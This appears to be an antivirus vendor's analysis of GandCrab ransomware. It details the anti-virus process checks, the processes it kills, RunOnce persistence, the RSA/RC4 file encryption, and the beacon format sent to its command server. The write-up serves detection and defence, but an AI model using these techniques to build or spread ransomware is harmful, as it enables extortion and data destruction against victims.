An encryption Trojan for the Microsoft Windows operating systems. Its self-designation is “GandCrab!”. A message with racketeers’ demands and a list of extensions of encoded files are stored in the Trojan’s body encrypted with the use of the XOR algorithm.
The malicious program can collect information on availability of the following running processes of anti-viruses:
AVP.EXE ekrn.exe avgnt.exe ashDisp.exe NortonAntiBot.exe Mcshield.exe avengine.exe cmdagent.exe smc.exe persfw.exe pccpfw.exe fsguiexe.exe cfp.exe msmpeng.exe
In order to prevent the repeated launch, the Trojan obtains a name of a work group in the local network, serial number of the hard drive volume and the processor model name. On the basis of these data, it forms a mutex name. If there is already a mutex with the same name, the Trojan shuts down. Then it kills the following processes:
sqlservr.exe msftesql.exe sqlagent.exe sqlbrowser.exe sqlwriter.exe oracle.exe ocssd.exe dbsnmp.exe synctime.exe mydesktopqos.exe agntsvc.exeisqlplussvc.exe xfssvccon.exe mydesktopservice.exe ocautoupds.exe agntsvc.exeagntsvc.exe agntsvc.exeencsvc.exe firefoxconfig.exe tbirdconfig.exe ocomm.exe mysqld.exe mysqld-nt.exe mysqld-opt.exe dbeng50.exe sqbcoreservice.exe excel.exe infopath.exe msaccess.exe mspub.exe onenote.exe outlook.exe powerpnt.exe steam.exe thebat.exe thebat64.exe thunderbird.exe visio.exe winword.exe wordpad.exe
After the processes are shut down, the Trojan forms a message with cybercriminals’ demands and generates the RSA-2048 key pair. Then it sends a call request to its command and control server, zeroes a private key in the memory and starts the process of its installation to the system.
If the Trojan is not launched from the folder %APPDATA%, it creates its own copy with an arbitrary name in the folder %APPDATA%\Microsoft\. Path to this file is saved in the thread of the system registry [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] with an arbitrary name of the parameter.
The Trojan encrypts the contents of the fixed, removable and network disks. Each disk is encrypted in a separate thread. When the encryption is completed, the Trojan sends to the server the data on the amount of encrypted files and the encryption time. The following folders are not encrypted:
ProgramData Program Files Tor Browser Ransomware All Users Local Settings %PROGRAM_FILESX86% %PROGRAM_FILES_COMMON% %WINDOWS% %LOCAL_APPDATA%
The data required for encryption are generated for each file, then they are encrypted with the public RSA key. The encrypted files have the GDCB extension.
The Trojan uses the command and control server, the domain name of which is not resolved with standard methods. To obtain an IP address of the command and control server, the encoder executes the command nslookup and obtains the address from its output. If an attempt to obtain the IP address is unsuccessful, the encryption is not performed.
To send the call request to the command and control server, the Trojan forms a string that looks the following way:
action=call&ip=220.127.116.11&pc_user=root&pc_name=PC&pc_group=WORKGROUP&pc_keyb=0&os_major=Microsoft Windows XP&os_bit=x86&ransom_id=1111111111111111&hdd=C:FIXED_...&pub_key=...&priv_key=...&version=1.0
- action — the request type;
- ip — an external address of an infected computer (if the Trojan is unsuccessful when obtaining it, the field stays blank);
- pc_user — user name;
- pc_name — computer name;
- pc_group — work group name;
- pc_keyb — keyboard layout code;
- os_major — Windows version (it is extracted from the key of the system registry HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\productName);
- os_bit — Windows bitness;
- ransom_id — infection identifier;
- hdd — information about disks;
- pub_key — a public key encoded in base64;
- priv_key — a private key encoded in base64;
- version — the internal Trojan version.
The obtained string is encrypted using the RC4 algorithm. Then the result is additionally encoded using base64. The obtained data are sent to the command and control server with the POST request, which looks like %IP_ADDR%/curl.php?token=1234 (the value token is extracted from the packed Trojan’s body). As a response, the malicious program receives the data encoded with the use of base64 and encrypted with the same RC4 key. They could contain a command for self-removal and a list of extensions for encryption (also encoded using base64).
At present, decryption of files encrypted with this Trojan is impossible.